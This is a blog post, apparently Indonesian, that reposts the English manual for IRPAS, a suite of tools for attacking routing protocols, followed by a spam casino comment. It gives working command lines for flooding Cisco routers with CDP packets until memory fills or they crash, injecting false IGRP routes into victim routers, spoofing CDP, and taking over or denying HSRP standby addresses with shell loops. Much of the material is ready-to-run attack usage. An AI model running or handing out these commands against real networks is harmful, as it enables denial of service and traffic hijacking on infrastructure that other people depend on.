satu lagi suite/kumpulan tool terbaik, kali untuk routing protokol internet dll. IRPAS, download di http://www.phenoelit.de/irpas/download.html
ini dokumentasi lengkapnya (masih versi bule 
Introduction
IRPAS contains at the moment the following tools:
cdp
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
igrp
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
irdp
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
irdpresponder
Waits for IRDP requests and sends out response packets to fool clients.
ass
ASS is a Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more then one protocol. This is ASS.
file2cable
sends out raw ethernet frames from files
itrace
traceroute(1) by ICMP echo request
tctrace
traceroute(1) by TCP SYN packets
netenum
enumeration / ping-sweep tool
netmask
ICMP netmask request
protos
IP protocol scanner
hsrp
HSRP takeover tool
These tools are not point-and-click. You should at least know, what you want to do with the particular protocol. So if you are not familiar with CDP, don´t try to use it.
CDP
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is just usefull in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are send to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is, that Cisco IOS uses the device ID as key to find out if the received message is an update and the neighbor is already known or not. If the device ID is to long, this test seems to fail and you constantly fill up the routers memory.
The CDP tool can be used in two different modi:
The flood mode is used to send garbage CDP messages to the wire, which has different effects to the routers depending on their IOS version. It is not tested very well, which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across somthing, please report it. IOS 11.1(1) was tested and the router could match even long device id´s but rebooted after receiving three or four random device id names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS we tested crashed and reboot.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v verbose
-n x send x packets
-l x length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller the 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c fills the device id with the char ‘c’
(default is ‘A’)
-r makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash
Example:
./cdp -i eth0 -n 10000 -l 1480 -r
Hint: if you want to flood the routers completly, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actuall use for attacking router and is mostly targeted fro social engineering or just to confuse the local administrator. It is used to send out 100% valid CDP infromation packets which look like generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i
-v verbose
-D
-P
-L
-S
-F
-C
R - Router, T - Trans Bridge, B - Source Route Bridge,
S - Switch, H - Host, I - IGMP, r - Repeater
Combine the letters to a string: RI means Router and IGMP
Example:
./cdp -v -i eth0 -m 1 -D ‘Hacker’ -P ‘Ethernet0′ -C RI \
-L ‘Intel’ -S “`uname -a`” -F ‘255.255.255.255′
Which results on the cisco router in the following information:
cisco#sh cdp neig detail
————————-
Device ID: Hacker
Entry address(es):
IP address: 255.255.255.255
Platform: Intel, Capabilities: Router IGMP
Interface: Ethernet0, Port ID (outgoing port): Ethernet0
Holdtime : 238 sec
Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown
IGRP
IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address (255.255.255.255). If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design your routing table you want to inject in the target router. It should contain data which makes your route the prefered one for the victim. The format is:
destination:delay:bandwith:mtu:reliability:load:hopcount
where destination is the network (192.168.1.0), delay is in ms/10, bandwith in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
Example:
# Routes file for igrp.c
#
# FX
# Phenoelit (http://www.phenoelit.de/)
#
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
#
# Examples
222.222.222.0:500:1:1500:255:1:0
Usage: ./igrp -i
-i
-v verbose
-f
(as much as you like)
-a
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S
-D
address is used
If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim beliving your routes.
ASS
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protcols by giving the option -P and any combination of the following chars: IER12, where:
I = IGRP
E = EIGRP
R = IRDP
1 = RIPv1
2 = RIPv2
Usage is trival:
./ass [-v[v[v]]] -i
-a
[-S
[-T
Where:
-i
-v verbose
-A this sets the scanner into active mode
-P
-M EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a
-b
-S
-D
address per protocol is used
-p don’t run in promiscuous mode (bad idea)
-c terminate after scanning. This is not
recommened since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T
miliseconds (-T 1 is the slowest scan
-T 100 begins to become unreliable)
I really suggest to use -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don´t know what the ‘network x.y.z.0′ statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but has it’s meanings:
Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more then one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
IRDP
The IRDP info is limmited to the announced gateway (router) and it’s preference
RIPv1
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and it’s metric
RIPv2
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
IRDP
This tool sends out IRDP responses. Nothing else
Usage:
-i
-p
-l
-S
-D
address is used
IRDPresponder
Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
Usage:
-v verbose
-P enable promiscuous mode
-i
-p
-l
-S
-D
broadcast address is used
file2cable
This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame - AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
Usage:
-v verbose (hex dump to screen)
-i
-f
itrace
Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
tctrace
TCtrace is like itrace a traceroute(1) brother - but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timout after x seconds (default=3)
-D x Destination port x (default=80)
-S x Source port x (default=1064)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
netenum
netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum 10.1.2.3/25
netenum
destination can be in the following formats:
dotted IP address: 10.1.1.1
IP and Netmask: 10.1.1.1/255.255.255.0
IP and “slashmask”: 10.1.1.1/24
Name: www.phenoelit.de
timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)
An application would be a remote HSRP attack:
for i in `netenum 10.1.2.0/26`
do
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0
done
netmask
netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
protos
Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d 10.1.2.3 -v
-v verbose
-V show which protocols are not supported
-u don’t ping targets first
-s make the scan slow (for very remote devices)
-L show the long protocol name and it’s reference (RFC)
-p x number of probes (default=5)
-S x sleeptime is x (default=1)
-a x continue scan afterwards for x seconds (default=3)
-d dest destination (IP or IP/MASK)
-i interface the eth0 stuff
-W don’t scan, just print the protocol list
Normal output for a Windows host looks like this:
10.1.1.4 may be running (did not negate):
ICMP IGMP TCP UDP
While a cisco router supports more:
10.1.1.1 may be running (did not negate):
ICMP IPenc TCP IGP UDP GRE SWIPE MOBILE SUN-ND EIGRP IPIP
hsrp
HSRP protcol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP: Usage: ./hsrp -i eth0 -v 1.2.3.4 -d 224.0.0.2 -a cisco -g 1
-i int the eth0 stuff
-v ip the standby IP address
-d dest the destination IP (multicast or directed)
-a auth the password (default=”cisco”)
-g x the standby group
-S source spoofed source if desired
To take over the standby IP 10.1.1.1 from all HSRP routers to the VIPPR IP 10.1.1.66 use
while (true)
do
./hsrp -d 224.0.0.2 -v 10.1.1.1 -a cisco -g 1 -i eth0 -S 10.1.1.66
sleep 3
done
To force 10.1.1.2 into standby (and therefore having another HSRP router taking over) use
while (true)
do
./hsrp -d 10.1.1.2 -v 10.1.1.1 -a cisco -g 1 -i eth0
sleep 3
done
1 komentar:
Do you want to play the coin casino with cryptocurrency? - CasinoWow
Looking for the best free casino games? kadangpintar Well, 인카지노 you need the best cryptocurrency casino games software 바카라 and services. You can join with the
Posting Komentar